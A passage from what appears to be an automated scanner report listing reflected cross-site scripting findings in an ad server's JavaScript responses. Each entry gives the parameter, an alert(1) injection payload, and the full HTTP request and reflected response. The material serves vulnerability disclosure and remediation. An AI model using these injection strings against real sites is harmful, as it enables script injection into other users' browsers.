02%3B4252-336/280%3B39025850/39043607/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory81584"-alert(1)-"f1713590b03&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound
...[SNIP]...

4.78. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 919b0"-alert(1)-"47f06942a38 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle919b0"-alert(1)-"47f06942a38&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6425

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/280%3B39025848/39043606/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle919b0"-alert(1)-"47f06942a38&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

4.79. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d759f'-alert(1)-'26bb58939a1 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddled759f'-alert(1)-'26bb58939a1&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/280%3B39025845/39043602/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddled759f'-alert(1)-'26bb58939a1&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.80. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e2d2'-alert(1)-'8bc2132a1be was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b1e2d2'-alert(1)-'8bc2132a1be&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6425

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
x_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b1e2d2'-alert(1)-'8bc2132a1be&goto=http://www.xc4.is\">
...[SNIP]...

4.81. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [sn1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c3cf"-alert(1)-"2797ce68773 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b9c3cf"-alert(1)-"2797ce68773&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
x_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b9c3cf"-alert(1)-"2797ce68773&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var
...[SNIP]...

4.82. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46242"-alert(1)-"4c02dbc8d53 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e346242"-alert(1)-"4c02dbc8d53&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
1%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e346242"-alert(1)-"4c02dbc8d53&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "nev
...[SNIP]...

4.83. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [sn2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e338'-alert(1)-'16742ae9f75 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e31e338'-alert(1)-'16742ae9f75&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
1%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e31e338'-alert(1)-'16742ae9f75&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.84. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f835"-alert(1)-"d4361fd75fc was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick3f835"-alert(1)-"d4361fd75fc&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick3f835"-alert(1)-"d4361fd75fc&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var open
...[SNIP]...

4.85. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [snr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25932'-alert(1)-'7a4e7340a55 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick25932'-alert(1)-'7a4e7340a55&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6425

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick25932'-alert(1)-'7a4e7340a55&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.86. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df5cf"-alert(1)-"cabd323b909 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073df5cf"-alert(1)-"cabd323b909&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6425

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073df5cf"-alert(1)-"cabd323b909&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false
...[SNIP]...

4.87. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [snx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36d88'-alert(1)-'b2fe71d3c54 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=128980207336d88'-alert(1)-'b2fe71d3c54&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=128980207336d88'-alert(1)-'b2fe71d3c54&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.88. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2742c'-alert(1)-'b4a024bcc9a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto2742c'-alert(1)-'b4a024bcc9a&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8/3a53/7/10c/%2a/s%3B231651615%3B2-0%3B0%3B55718902%3B4252-336/280%3B39025850/39043607/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto2742c'-alert(1)-'b4a024bcc9a&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.i
...[SNIP]...

4.89. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

